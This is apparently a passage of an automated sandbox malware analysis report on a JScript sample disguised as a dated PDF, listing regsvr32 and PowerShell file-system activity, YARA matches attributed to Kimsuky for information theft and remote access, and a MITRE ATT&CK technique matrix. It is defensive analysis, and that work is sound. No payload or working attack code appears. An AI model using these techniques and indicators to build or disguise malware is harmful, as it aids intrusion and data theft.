Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ProgramData\temp\3AED.tmp VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ProgramData\temp\4C70.tmp-PowerShell_transcript.910646.BLm8LGmw.20210825105913.txt VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ProgramData\temp\8848.tmp VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\regsvr32.exe

Code function: 13_2_00007FF983DD79B0 cpuid

13_2_00007FF983DD79B0

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 13_2_00007FF983DE31F8 GetSystemTimeAsFileTime,

13_2_00007FF983DE31F8

Source: C:\Windows\System32\regsvr32.exe

Code function: 13_2_00007FF983DD1318 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

13_2_00007FF983DD1318

Source: C:\Windows\System32\regsvr32.exe

Code function: 13_2_00007FF983D91290 GetVersion,GetNativeSystemInfo,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

13_2_00007FF983D91290

Stealing of Sensitive Information:

Yara detected Kimsuky

Show sources

Source: Yara match	File source: 24.2.regsvr32.exe.7ff983d00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.7ff983d90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.regsvr32.exe.7ff983d00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.558431847.00007FF983D01000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Kimsuky

Show sources

Source: Yara match	File source: 24.2.regsvr32.exe.7ff983d00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.7ff983d90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.regsvr32.exe.7ff983d00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.558431847.00007FF983D01000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Scripting221	DLL Side-Loading1	DLL Side-Loading1	Deobfuscate/Decode Files or Information11	OS Credential Dumping	System Time Discovery2	Replication Through Removable Media1	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Native API1	Application Shimming1	Application Shimming1	Scripting221	LSASS Memory	Peripheral Device Discovery11	Remote Desktop Protocol	Screen Capture1	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	PowerShell2	Registry Run Keys / Startup Folder1	Access Token Manipulation1	Obfuscated Files or Information121	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Data Encoding1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Process Injection111	Software Packing1	NTDS	System Information Discovery24	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder1	DLL Side-Loading1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol12	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading111	Cached Domain Credentials	Security Software Discovery131	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion31	DCSync	Process Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Virtualization/Sandbox Evasion31	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection111	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Regsvr321	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails